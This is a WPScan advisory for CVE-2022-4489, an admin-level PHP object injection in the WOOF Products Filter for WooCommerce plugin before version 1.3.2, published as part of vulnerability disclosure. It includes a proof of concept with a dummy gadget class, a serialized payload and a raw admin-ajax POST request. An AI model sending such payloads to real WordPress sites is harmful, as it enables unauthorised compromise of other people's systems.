WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WOOF - Products Filter for WooCommerce < 1.3.2 - Admin+ PHP Object Injection

Description

The plugin unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.

Proof of Concept

1. To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

2. First, enable Import/Export extension: WooCommerce > Settings > Products Filter > Extensions > Tick the box Import/Export > Save changes (requires the "WooCommerce" plugin to be active)

3. Use "Export/Import" function in WooCommerce > Settings > Products Filter > Advanced > Export/Import, and enter with the following content: {"evil":"O:4:\"Evil\":0:{}"}

4. When clicking "Import placed data", click "OK", We will get an "Arbitrary deserialization" message.

POST /wp-admin/admin-ajax.php HTTP/1.1

action=woof_do_import_data&import_value=%7B%22evil%22%3A%22O%3A4%3A%5C%22Evil%5C%22%3A0%3A%7B%7D%22%7D

Affects Plugins

woocommerce-products-filter
Fixed in version 1.3.2

References

CVE
CVE-2022-4489

Classification

Type

OBJECT INJECTION

OWASP top 10
A8: Insecure Deserialization
CWE
CWE-502

Miscellaneous

Original Researcher

thinhnguyen1337

Submitter

thinhnguyen1337

Submitter twitter
thinhnd01
Verified

Yes

WPVDB ID
067573f2-b1e6-49a9-8c5b-f91e3b9d722f

Timeline

Publicly Published

2023-01-11 (about 2 months ago)

Added

2023-01-11 (about 2 months ago)

Last Updated

2023-01-11 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin